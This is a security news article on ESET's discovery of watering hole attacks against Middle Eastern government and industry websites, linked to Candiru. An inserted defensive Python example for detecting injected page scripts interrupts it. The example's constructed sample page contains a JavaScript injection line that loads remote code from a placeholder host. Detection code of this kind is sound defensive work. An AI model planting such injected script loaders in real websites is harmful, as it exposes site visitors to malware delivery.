ESET discovers watering hole attacks on websites in Middle East, links to Candiru

News Desk


Strategic web compromise (watering hole) attacks against high-profile websites in the Middle East have been found by ESET researchers, with a significant concentration on Yemen. Candiru, a business that sells state-of-the-art offensive software tools and related services to government organizations, is linked to the attacks. A watering hole attack compromises websites that are likely to be visited by targets of interest, allowing a website visitor’s machine to be infected. Specific visitors to these websites were most likely targeted in this campaign via a browser vulnerability.

Government institutions in Iran (Ministry of Foreign Affairs), Syria (including the Ministry of Electricity), and Yemen (including the Ministries of Interior and Finance); internet service providers in Yemen and Syria; and aerospace/military technology companies in Italy and South Africa are among the websites that have been targeted. The attackers also constructed a website that looked like it was from a medical trade show in Germany.

“Back in 2018, we developed a custom in-house system to uncover watering holes on high-profile websites. On July 11, 2020, our system notified us that the website of the Iranian embassy in Abu Dhabi had been tainted with malicious JavaScript code. Our curiosity was aroused by the high-profile nature of the targeted website, and in the following weeks we noticed that other websites with connections to the Middle East were also targeted,” says ESET researcher Matthieu Faou who uncovered the watering hole campaigns.

“The threat group went quiet until January 2021, when we observed a new wave of compromises. This second wave lasted until August 2021, when all websites were cleaned again as was the case in 2020 – likely by the perpetrators themselves,” he adds.

“The attackers also mimicked a website belonging to the World Forum for Medicine’s MEDICA Trade Fair held in Düsseldorf, Germany. The operators cloned the original website and added a small piece of JavaScript code. It is likely that the attackers were not able to compromise the legitimate website and had to set up a fake one to inject their malicious code,” says Faou.

“In a blogpost about Candiru by Citizen Lab at the University of Toronto, the section called ‘A Saudi-Linked Cluster?’ mentions a spearphishing document that was uploaded to VirusTotal and multiple domains operated by the attackers. The domain names are variations of genuine URL shorteners and web analytics websites, which is the same technique used for the domains being seen in the watering hole attacks,” explains Faou, linking the attacks to Candiru.

ESET researchers were, however, unable to obtain either an exploit or the final payload. This shows how highly targeted the campaign is: the threat actors chose to keep their operations narrowly focused and did not want to burn their zero-day exploits. The compromised websites serve only as a launching pad against the final targets.

During the 2020 campaign, the malicious script checked the visitor's operating system and web browser. Because this selection depended on desktop (PC) software, mobile devices were not targeted. In the second wave, the attackers switched to modifying scripts already present on the compromised websites, which made the injection stealthier than adding a new script.
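A defender-side illustration of the kind of monitoring the article describes (ESET's in-house system flagged the Iranian embassy site when injected JavaScript appeared). This is an added example written for this page, not ESET's tooling: it keeps a baseline of the scripts a page serves, then reports new external script sources, inline scripts whose content changed (the second-wave technique of editing existing scripts), and script references to hosts outside an operator-maintained allowlist. The HTML snippets, the `.invalid` hostnames and the `audit` helper are constructed for the example.

```python
"""Script-integrity baseline check for spotting watering-hole style injections.

Added example, not ESET's in-house system. Hostnames and HTML are constructed.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collects external <script src> URLs and inline <script> bodies in document order."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, so this captures JS source.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf).strip())
            self._in_script = False


def fingerprint(html):
    """Return a baseline record: external sources plus SHA-256 of each inline script."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return {
        "external": parser.external,
        "inline": [hashlib.sha256(s.encode("utf-8")).hexdigest() for s in parser.inline],
        "inline_bodies": parser.inline,
    }


URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def foreign_hosts(record, allowed_hosts):
    """Hosts referenced from any script that are not on the operator's allowlist."""
    hosts = set()
    candidates = list(record["external"])
    for body in record["inline_bodies"]:
        candidates.extend(URL_RE.findall(body))
    for url in candidates:
        host = urlparse(url).hostname  # relative paths such as /static/app.js yield None
        if host and host not in allowed_hosts:
            hosts.add(host)
    return sorted(hosts)


def compare(baseline, current, allowed_hosts):
    """Diff a fresh fingerprint against the baseline; returns human-readable findings."""
    findings = []
    for src in current["external"]:
        if src not in baseline["external"]:
            findings.append(f"new external script: {src}")
    for i, digest in enumerate(current["inline"]):
        if i >= len(baseline["inline"]):
            findings.append(f"new inline script #{i} sha256={digest[:16]}")
        elif digest != baseline["inline"][i]:
            findings.append(f"inline script #{i} changed sha256={baseline['inline'][i][:16]}->{digest[:16]}")
    if len(current["inline"]) < len(baseline["inline"]):
        findings.append("inline script(s) removed since baseline")
    for host in foreign_hosts(current, allowed_hosts):
        findings.append(f"script references host outside allowlist: {host}")
    return findings


# Constructed sample pages: the "compromised" copy has a line appended to an existing script.
BASELINE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>
window.siteConfig = {lang: "en"};
</script>
</head><body><p>Embassy news</p></body></html>"""

COMPROMISED_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>
window.siteConfig = {lang: "en"};
var s=document.createElement("script");s.src="https://stats-collector.invalid/t.js";document.head.appendChild(s);
</script>
</head><body><p>Embassy news</p></body></html>"""

ALLOWED_HOSTS = {"www.embassy-site.invalid"}  # constructed allowlist of legitimate script hosts


def audit(baseline_html, current_html, allowed_hosts=ALLOWED_HOSTS):
    """Hypothetical helper: fingerprint both copies and report the differences."""
    return compare(fingerprint(baseline_html), fingerprint(current_html), allowed_hosts)


if __name__ == "__main__":
    for line in audit(BASELINE_HTML, COMPROMISED_HTML):
        print(line)
```

Comparing inline scripts by position rather than by a set of hashes is what makes an edit to an existing script show up as "changed" instead of as one script disappearing and another appearing; in practice the baseline would be refreshed from a known-good copy after every legitimate deployment, and the allowlist would be the site's real CDN and analytics hosts.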

As a result, there is a good chance that the operators of the watering hole campaigns are Candiru customers. The people who created the spearphishing documents and the people who run the watering holes could well be the same. Candiru is a private Israeli spyware firm that was recently added to the US Commerce Department's Entity List. This could make it impossible for any US-based company to do business with Candiru without first acquiring a Department of Commerce license.

ESET stopped monitoring activity from this operation around the end of July 2021, shortly after Citizen Lab, Google, and Microsoft published blogposts detailing Candiru’s activities. The operators appear to be taking a break, most likely to retool and make their operation more stealthy. They are expected to return in the next months, according to ESET Research.

Read the blog post “Strategic online compromise in the Middle East with a pinch of Candiru” on WeLiveSecurity for more technical details regarding these watering hole attacks against Middle Eastern websites. Make sure to follow ESET Research on Twitter for the most up-to-date information.
